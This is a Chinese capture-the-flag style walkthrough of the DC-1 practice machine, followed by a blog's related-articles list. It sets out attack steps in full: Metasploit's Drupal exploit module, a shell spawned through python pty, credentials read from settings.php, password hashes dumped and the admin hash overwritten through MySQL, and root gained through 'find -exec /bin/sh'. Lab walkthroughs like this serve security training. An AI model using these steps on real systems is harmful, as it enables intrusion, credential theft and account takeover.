DC-1

1、安装dc-1 靶机

2、内网扫描

查看主机IP
ip a
ifconfig

nmap扫描全网段
nmap -A -p- -v 192.168.27.0/24
-A 选项会执行操作系统探测、脚本扫描和服务/版本探测
-p-全端口扫描
-v 输出详细信息

或者

nmap -A 192.168.27.0/24

扫描之后查看结果

根据扫描出来的信息判断出靶机IP为192.168.27.137,且cms为drupal,语言为php,服务器为Linux,中间件为apache

扫描出ip之后也可以用指纹扫描工具来扫描出它的其他信息

whatweb 192.168.27.137 -v

访问ip

也可以利用插件识别出cms为drupal7,语言为php,服务器为Linux,中间件为apache

3、漏洞利用

首先尝试弱口令登陆,后台扫描端口扫描然后啥也没有

知道了cms那就百度一下发现存在远程代码执行漏洞

打开msf查找可利用模块
msfconsole
search drupal

选择模块
use 1

查看需要配置的参数

配置参数

设置一下RHOSTS内容(就是攻击目标IP地址,靶场地址)

set rhosts 192.168.27.137
run攻击

将反弹命令行控制台meterpreter,输入shell就可以执行命令了

run
执行shell命令
shell

ls查看当前文件目录

发现flag1

查看flag1的内容

cat flag1.txt

Every good CMS needs a config file - and so do you.
每个好的CMS都需要一个配置文件 - 你也是如此。
查看配置文件

根据提示查看配置文件,百度drupal地址,

cat /sites/default/settings.php

发现flag2
暴力破解和字典攻击不是
* 获得访问权限的唯一方法(并且您将需要访问权限)。
* 您可以使用这些凭据做什么? 还有意外收获,数据库用户名和密码
进入交互式shell

查看有效用户权限为www-data,现在我们处于的shell为非交互式shell,现在需要进入交互式shell ,而且他的权限是www-data权限,权限较低很多命令不能执行

whoami
python -c 'import pty;pty.spawn("/bin/bash")'
利用python反弹一个交互式shell TTY

连接数据库
mysql -u dbuser -p

查看数据库数据表

show databases;
use drupaldb;
show tables;

发现user表

查看users表的数据

select * from users;

select name,pass from users;

管理员账号密码修改

发现是经过加密的,且加密方式为哈希函数算法,在一般情况下服务器验证输入的密码是否正确时是通过加密输入的密码与正确的加密后的密码比对,来判断是否输入正确。

这个百度找到drupal的加密文件,通过数据库内容修改来实现管理员密码的修改

exit;
php ./scripts/password-hash.sh 123456
mysql -u dbuser -p
use drupaldb;
update users set pass='$S$DQZsZLqxCbnNCRuvOFCQBC2snsbkjGrH3Xw4nqxxhuYIONkuC4dP' where name='admin';

登陆

content模块下找到flag3

根据提示为:特殊的 PERMS 将帮助找到 passwd - 但您需要 -exec 该命令才能弄清楚如何获取阴影中的内容。

此时猜测应该是:find+perms+exec 命令用来提权

查看用户信息,发现flag4

查看flag4用户目录

flag4的内容:
您可以使用相同的方法在root中查找或访问该标志吗?
可能。但也许这并不容易。 或者也许是?
此时,还是避免不了root
find /root
find命令是用来在指定目录下查找文件。任何位于参数之前的字符串都将被视为欲查找的目录名。如果使用该命令时,不设置任何参数,则find命令将在当前目录下查找子目录与文件,并将查找到的子目录和文件全部进行显示。
发现flag文件

提权
find ./ acce -exec '/bin/sh' \;

拿到最后一个flag,结束

DC-1内网靶机入门的更多相关文章

  1. Vulnstack内网靶场1

    最近发现了一个内网的靶场网站,简单配置一下网络就可以,不用自己搭建这么麻烦漏洞信息 (qiyuanxuetang.net) 环境配置 内网1靶场由三台机器构成:WIN7.2008 server.200 ...

  2. 脑残式网络编程入门(六):什么是公网IP和内网IP?NAT转换又是什么鬼?

    本文引用了“帅地”发表于公众号苦逼的码农的技术分享. 1.引言 搞网络通信应用开发的程序员,可能会经常听到外网IP(即互联网IP地址)和内网IP(即局域网IP地址),但他们的区别是什么?又有什么关系呢 ...

  3. 利用Metasploit 打入ThinkPHP内网...

    出品|MS08067实验室(www.ms08067.com) 本文作者:dch(Ms08067实验室 SRSP TEAM小组成员) 一.利用Metasploit进行攻击的流程图   Metasploi ...

  4. Vulnstack内网靶场2

    环境配置 内网2靶场由三台机器构成:WIN7.2008 server.2012 server 其中2008做为对外的web机,win7作为个人主机可上网,2012作为域控 网络适配器已经设置好了不用自 ...

  5. Linux内网渗透

    Linux虽然没有域环境,但是当我们拿到一台Linux 系统权限,难道只进行一下提权,捕获一下敏感信息就结束了吗?显然不只是这样的.本片文章将从拿到一个Linux shell开始,介绍Linux内网渗 ...

  6. 内网劫持渗透新姿势:MITMf简要指南

    声明:本文具有一定攻击性,仅作为技术交流和安全教学之用,不要用在除了搭建环境之外的环境. 0×01 题记 又是一年十月一,想到小伙伴们都纷纷出门旅游,皆有美酒佳人相伴,想到这里,不禁潸然泪下.子曰:& ...

  7. ansible 访问内网服务器

    ssh https://medium.com/@paulskarseth/ansible-bastion-host-proxycommand-e6946c945d30#.rauzlfv0z http: ...

  8. (转)Ubuntu 17.04_64上搭建巡风扫描系统(资产信息漏洞扫描内网神器)

    巡风简介 巡风是一款适用于企业内网的漏洞快速应急.巡航扫描系统,通过搜索功能可清晰的了解内部网络资产分布情况,并且可指定漏洞插件对搜索结果进行快速漏洞检测并输出结果报表.其主体分为两部分:网络资产识别 ...

  9. 云计算之路-试用Azure:如何建立虚拟机之间的内网连接

    在阿里云上,同一个帐户创建的所有虚拟机(云服务器)之间的内网是直接连通的.而Azure则完全不一样,一开始使用时有点不知所措,后来摸索出来了——在Azure中只有处于同一个虚拟网络(Virtual N ...

  10. 7.内网渗透之windows认证机制

    文章参考自三好学生域渗透系列文章 看了内网渗透第五篇文章,发现如果想要真正了解PTT,PTH攻击流程,还需要了解windows的认证机制,包括域内的kerberos协议. windows认证机制 在域 ...

随机推荐

  1. python中多进程下通信使用管道Pipe与队列 Queue 的区别: Multiprocessing - Pipe vs Queue

    参考: https://stackoverflow.com/questions/8463008/multiprocessing-pipe-vs-queue ====================== ...

  2. 2023 CCPC 桂林题解

    gym H. Sweet Sugar 一个经典贪心是从下到上,如果子树 \(u\) 剩下的部分(一定包含 \(u\))包含合法连通块,那么这个连通块给答案贡献 \(1\),切断 \(u\) 与 \(f ...

  3. Node.js 使用

    创建 Node 项目 npm init -y # 初始化 Node 项目 package.json 文件 这个文件记录了项目的相关信息. { "name": "hello ...

  4. LaTeX 常用引用标签前缀

    引用对象 标签前缀 Chapter ch Section sec Subsection sec Appendix app Figure fig Table tab List item itm Equa ...

  5. 【解决方案】项目重构之如何使用 MySQL 替换原来的 MongoDB

    目录 前言 一.痛点所在 二.选型分析 2.1特点对比 2.2场景对比 三.核心思路 四.demo 示例 4.1实体映射 4.1.1MongoDB 实体 4.1.2MySQL 实体 4.2查询代码 4 ...

  6. CamoTeacher:玩转半监督伪装物体检测,双一致性动态调整样本权重 | ECCV 2024

    论文提出了第一个端到端的半监督伪装目标检测模型CamoTeacher.为了解决半监督伪装目标检测中伪标签中存在的大量噪声问题,包括局部噪声和全局噪声,引入了一种名为双旋转一致性学习(DRCL)的新方法 ...

  7. 游戏AI寻路——八叉树+A*寻路

    利用八叉树的空中寻路 你有思考过在空中如何进行寻"路"吗?来想象一个的场景:飞机从空中基地出发,要避开许多空中建筑,最终到达目的地.这种情况下的寻路是没有路面的,寻路物体的移动方向 ...

  8. Vue3 插槽技巧

    最近想着使用Vue3+ElementPlus封装一个后台管理常用的Table组件,设计之初考虑到高自定义性,所以便延伸出以下的代码 使用技术栈: Vue3.x ElementPlus Jsx Jsx ...

  9. Failed to convert value of type 'java.lang.String' to required type

    DEBUG 微信小程序Java后台 Failed to convert value of type 'java.lang.String' to required type 产生这种条件的原因一般是使用 ...

  10. CSS – RWD (Responsive Web Design) 概念篇

    介绍 Only PC 以前是没有手机的, 只有电脑, 所以做开发, 只需要开发电脑版本就可以了. Mobile Version 后来手机诞生, 有钱的公司就做两个版本, 一个手机版, 一个电脑版. 没 ...